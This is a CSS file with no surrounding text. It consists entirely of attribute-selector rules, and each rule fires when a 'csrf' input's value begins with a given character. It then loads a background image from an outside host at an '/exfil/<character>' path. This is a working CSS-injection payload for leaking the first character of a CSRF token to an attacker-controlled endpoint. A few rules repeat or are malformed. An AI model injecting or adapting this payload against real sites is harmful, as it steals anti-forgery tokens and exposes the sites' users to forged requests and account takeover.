input[name=csrf][value^="a"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/a); }
input[name=csrf][value^="z"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/z); }
input[name=csrf][value^="e"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/e); }
input[name=csrf][value^="r"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/r); }
input[name=csrf][value^="t"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/t); }
input[name=csrf][value^="y"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/y); }
input[name=csrf][value^="u"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/u); }
input[name=csrf][value^="i"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/i); }
input[name=csrf][value^="o"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/o); }
input[name=csrf][value^="p"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/p); }
input[name=csrf][value^="q"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/q); }
input[name=csrf][value^="s"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/s); }
input[name=csrf][value^="d"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/d); }
input[name=csrf][value^="f"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/f); }
input[name=csrf][value^="g"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/g); }
input[name=csrf][value^="h"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/h); }
input[name=csrf][value^="j"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/j); }
input[name=csrf][value^="k"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/k); }
input[name=csrf][value^="l"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/l); }
input[name=csrf][value^="m"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/m); }
input[name=csrf][value^="w"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/w); }
input[name=csrf][value^="x"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/x); }
input[name=csrf][value^="c"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/c); }
input[name=csrf][value^="v"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/v); }
input[name=csrf][value^="b"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/b); }
input[name=csrf][value^="n"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/n); }
input[name=csrf][value^="A"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/A); }
input[name=csrf][value^="Z"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/Z); }
input[name=csrf][value^="E"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/E); }
input[name=csrf][value^="R"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/R); }
input[name=csrf][value^="T"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/T); }
input[name=csrf][value^="Y"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/Y); }
input[name=csrf][value^="U"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/U); }
input[name=csrf][value^="I"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/I); }
input[name=csrf][value^="O"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/O); }
input[name=csrf][value^="P"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/P); }
input[name=csrf][value^="Q"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/Q); }
input[name=csrf][value^="S"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/S); }
input[name=csrf][value^="D"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/D); }
input[name=csrf][value^="F"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/F); }
input[name=csrf][value^="G"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/G); }
input[name=csrf][value^="H"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/H); }
input[name=csrf][value^="J"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/J); }
input[name=csrf][value^="K"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/K); }
input[name=csrf][value^="L"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/L); }
input[name=csrf][value^="M"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/M); }
input[name=csrf][value^="W"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/W); }
input[name=csrf][value^="X"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/X); }
input[name=csrf][value^="C"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/C); }
input[name=csrf][value^="V"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/V); }
input[name=csrf][value^="B"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/B); }
input[name=csrf][value^="N"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/N); }
input[name=csrf][value^="0"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/0); }
input[name=csrf][value^="1"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/1); }
input[name=csrf][value^="2"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/2); }
input[name=csrf][value^="3"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/3); }
input[name=csrf][value^="4"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/4); }
input[name=csrf][value^="5"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/5); }
input[name=csrf][value^="6"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/6); }
input[name=csrf][value^="7"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/7); }
input[name=csrf][value^="8"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/8); }
input[name=csrf][value^="9"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/9); }
input[name=csrf][value^="_"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/_); }
input[name=csrf][value^="-"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/-); }
input[name=csrf][value^="é"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/é); }
input[name=csrf][value^="à"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/à); }
input[name=csrf][value^="è"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/è); }
input[name=csrf][value^="ù"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/ù); }
input[name=csrf][value^="ç"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/ç); }
input[name=csrf][value^="€"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/€); }
input[name=csrf][value^="£"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/£); }
input[name=csrf][value^="?"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/?); }
input[name=csrf][value^=","]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/,); }
input[name=csrf][value^=";"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/;); }
input[name=csrf][value^=":"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/:); }
input[name=csrf][value^="!"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/!); }
input[name=csrf][value^="?"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/?); }
input[name=csrf][value^="."]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/.); }
input[name=csrf][value^="/"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil//); }
input[name=csrf][value^="§"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/§); }
input[name=csrf][value^="$"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/$); }
input[name=csrf][value^="é"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/é); }
input[name=csrf][value^="è"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/è); }
input[name=csrf][value^="&"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/&); }
input[name=csrf][value^="="]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/=); }
input[name=csrf][value^="+"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/+); }
input[name=csrf][value^="<"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/<); }
input[name=csrf][value^=">"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/>); }
input[name=csrf][value^="~"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/~); }
input[name=csrf][value^="#"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/#); }
input[name=csrf][value^="*"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/*); }
input[name=csrf][value^="%"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/%); }
input[name=csrf][value^="""]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/"); }
input[name=csrf][value^="'"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/'); }
input[name=csrf][value^="{"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/{); }
input[name=csrf][value^="}"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/}); }
input[name=csrf][value^="("]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/(); }
input[name=csrf][value^=")"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/)); }
input[name=csrf][value^="["]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/[); }
input[name=csrf][value^="]"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/]); }
input[name=csrf][value^="|"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/|); }
input[name=csrf][value^="\"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/\); }
input[name=csrf][value^="/"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil//); }
input[name=csrf][value^="^"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/^); }
input[name=csrf][value^="@"]{ background-image: url(https://evilecss.free.beeceptor.com/exfil/@); }
